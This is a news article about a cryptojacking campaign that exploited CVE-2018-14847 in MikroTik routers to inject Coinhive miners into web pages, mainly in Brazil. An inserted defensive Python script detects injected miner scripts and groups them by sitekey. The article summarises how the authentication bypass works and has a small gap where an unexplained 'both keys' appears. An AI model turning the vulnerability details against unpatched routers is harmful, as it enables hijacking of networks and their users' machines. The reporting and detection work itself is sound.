According to Trustwave researcher Simon Kenin, on July 31 a surge in Coinhive activity was detected that indicated a malicious cryptocurrency mining operation was underway.
In a blog post, the researcher said that upon further examination, it appeared to be MikroTik devices that are involved.
Latvia-based MikroTik provides network equipment for customers worldwide, and in this campaign, Brazil is the main country which has been targeted.
It might have been a strange coincidence and nothing more than a set of compromises occurring at the same time, but Kenin noticed that all of the devices were using the same Coinhive sitekey.
Coinhive is legitimate software used, generally in-browser, by websites to borrow visitor CPU power temporarily in order to mine the virtual currency Monero. Widespread abuse of the script has led to many antivirus and cybersecurity solutions companies blocking the script.
If the same sitekey was in use, this indicates that all of the devices involved were mining for virtual gold on behalf of one controlling entity.
If both keys are the work of the same threat actor, this brings the count to roughly 200,000.
It took some digging by the researcher to find a link between the Coinhive activity spike and MikroTik. A router developed by the company was traced back to a compromise in a hospital in Brazil, and a Reddit post from an individual having trouble with their own system, published at roughly the same time in a bid to find help, provided some clues.
The user in question said that every web page they visited had the Coinhive code injected into it, and neither changing the DNS nor removing the router helped.
“At this point, it’s worth noting that MikroTik routers are used by Internet providers and big organizations, and in this case, it seems that the Reddit post’s author’s ISP had their router compromised, same as the router of the hospital I mentioned earlier in the post,” the researcher said.
A tweet from MalwareHunter then provided a link.
The message mentioned a “mass exploitation” of MikroTik devices. However, the vulnerability which allowed the firm’s routers to become cryptocurrency mining slaves was no zero-day; instead, it is CVE-2018-14847, a known security bug impacting Winbox for MikroTik RouterOS.
Through version 6.42 of the software, remote attackers are able to bypass authentication and read arbitrary files by modifying a request to change one byte related to a Session ID, according to the vulnerability description.
The mass-exploit of these devices is not necessarily the vendor’s fault. The bug was patched within a day of discovery, but sadly, hundreds of thousands of devices have not been updated, leaving them vulnerable to exploit.
By utilizing the security flaw, the threat actor responsible for the campaign was able to compromise the routers to inject the Coinhive script into every web page visited by the user.
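A defender-side check that follows from the sitekey observation above and the per-page injection just described, written as an added example rather than code from the Trustwave post: it scans captured HTTP response bodies (constructed samples here, not real captures) for an injected Coinhive loader, extracts the sitekey, and groups affected URLs by key, since one key across many hosts points to a single operator. The `CoinHive.Anonymous(...)` / `CoinHive.User(...)` call forms are assumed from the miner's public loader API.

```python
import re

# Constructed sample response bodies (not real captures). Two pages carry the
# same injected sitekey, one carries a different key, one is clean.
SAMPLE_PAGES = {
    "http://host-a.example/": (
        "<html><head><title>A</title>\n"
        '<script src="https://coinhive.com/lib/coinhive.min.js"></script>\n'
        "<script>var m=new CoinHive.Anonymous('KEY-ONE-PLACEHOLDER');m.start();</script>\n"
        "</head><body>hello</body></html>"
    ),
    "http://host-b.example/news": (
        '<html><head><script src="https://coinhive.com/lib/coinhive.min.js"></script>'
        "<script>new CoinHive.Anonymous('KEY-ONE-PLACEHOLDER').start();</script></head>"
        "<body>news</body></html>"
    ),
    "http://host-c.example/shop": (
        '<html><head><script src="https://coinhive.com/lib/coinhive.min.js"></script>'
        "<script>new CoinHive.User('KEY-TWO-PLACEHOLDER','user1').start();</script></head>"
        "<body>shop</body></html>"
    ),
    "http://host-d.example/": "<html><head><title>clean</title></head><body>ok</body></html>",
}

# Loader URL used by the in-browser miner; the sitekey is the first string
# argument to the constructor (assumed API shape, see lead-in).
COINHIVE_LOADER = re.compile(r"coinhive\.com/lib/coinhive\.min\.js", re.I)
SITEKEY = re.compile(r"CoinHive\.(?:Anonymous|User)\(\s*['\"]([A-Za-z0-9_\-]+)['\"]", re.I)


def find_injected_miner(body: str):
    """Return the Coinhive sitekey if the page loads the miner, else None."""
    if not COINHIVE_LOADER.search(body):
        return None
    match = SITEKEY.search(body)
    # Loader present but no parseable key is still worth flagging.
    return match.group(1) if match else "unknown-sitekey"


def correlate_by_sitekey(pages: dict) -> dict:
    """Map each observed sitekey to the sorted list of URLs that carry it."""
    groups = {}
    for url, body in pages.items():
        key = find_injected_miner(body)
        if key is not None:
            groups.setdefault(key, []).append(url)
    return {key: sorted(urls) for key, urls in groups.items()}


if __name__ == "__main__":
    for key, urls in correlate_by_sitekey(SAMPLE_PAGES).items():
        print(f"sitekey {key}: {len(urls)} page(s) -> {urls}")
```

Run against response bodies captured at a proxy or IDS, a single key spanning many unrelated hosts is the signal that upstream infrastructure, not the sites themselves, is injecting the script.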
It is not known who is behind the campaign, but Kenin believes that “the attacker is clearly showing a high level of understanding of how these MikroTik routers work.”
This campaign is yet another example of what can happen on a vast scale should individual devices not receive security updates.
In the same way that the Mirai IoT botnet was able to wreak devastation through unsecured consumer home devices, the individual security of our devices needs to be taken more seriously.
“Ransomware awareness has increased significantly, so in many cases, even if an attacker manages to encrypt files, users these days have backups,” the researcher added. “This means that they don’t pay the ransom as frequently as they used to. Miners, on the other hand, can be a lot more stealthy, so while a single computer would yield more money from ransomware if the user ends up paying, an attacker would prefer to run a stealthy miner for a longer period of time.”